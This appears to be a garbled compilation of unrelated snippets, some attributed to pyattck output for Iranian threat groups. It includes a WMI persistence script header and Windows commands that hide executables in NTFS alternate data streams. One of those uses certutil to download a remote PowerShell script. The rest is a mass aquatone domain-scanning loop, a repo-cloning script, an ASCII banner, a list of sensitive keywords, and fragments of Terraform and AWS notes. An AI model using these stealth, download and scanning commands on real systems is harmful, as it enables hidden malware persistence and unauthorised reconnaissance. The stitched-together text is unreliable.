The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
' | |
' SYNOPSIS: | |
' WMI Persistence method as originally presented by SEADADDY malware | |
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
' and further documented by Matt Graeber. | |
' | |
' The scheduled command will be launched after roughly 3 minutes since system | |
' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
' |
###Add content to ADS### | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
#!/bin/bash | |
user="CHANGEME" | |
pages=$(curl -I https://api.github.com/users/$user/starred | sed -nr 's/^Link:.*page=([0-9]+).*/\1/p') | |
for page in $(seq 0 $pages); do | |
curl "https://api.github.com/users/$user/starred?page=$page&per_page=100" | jq -r '.[].html_url' | | |
while read rp; do | |
git clone $rp | |
done |
#!/bin/bash | |
echo " ______ ______ ______ __ ______ ______ __ __ ______ __ __ | |
/\__ _\ /\ __ \ /\ __ \ /\ \ /\ == \ /\ __ \ /\_\_\_\ /\ ___\ /\ \_\ \ | |
\/_/\ \/ \ \ \/\ \ \ \ \/\ \ \ \ \____ \ \ __< \ \ \/\ \ \/_/\_\/_ \ \___ \ \ \ __ \ | |
\ \_\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ /\_\/\_\ \/\_____\ \ \_\ \_\ | |
\/_/ \/_____/ \/_____/ \/_____/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/_/\/_/ " | |
echo "" |
#!/bin/bash | |
wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip | |
unzip top-1m.csv.zip | |
for l in `cat top-1m.csv | cut -d',' -f2` | |
do | |
aquatone-discover -d $l --threads 90 | |
done |
4chan | |
activis* | |
allah | |
alpha | |
alt-right* | |
anarchis* | |
anita sarkeesian | |
arian | |
aryan | |
Auschwitz |
Recently I had to learn myself some Terraform for real, and it hit me - Docker (which I have come to use extensively) would be a perfect environment in which to do this.
Before you begin, make sure you have Terraform installed:
$ brew install terraform
----- Interested Reads------ | |
+ Interesting Read (Serverless Architecture of Acloud guru) | |
https://read.acloud.guru/serverless-the-future-of-software-architecture-d4473ffed864 | |
----- Getting Started------- | |
+ Requirements | |
+ AWS Free Tier Account | |
+ PC with putty and putty keygen/ Mac | |
+ Optional | |
+ IoS/ Android App $20 |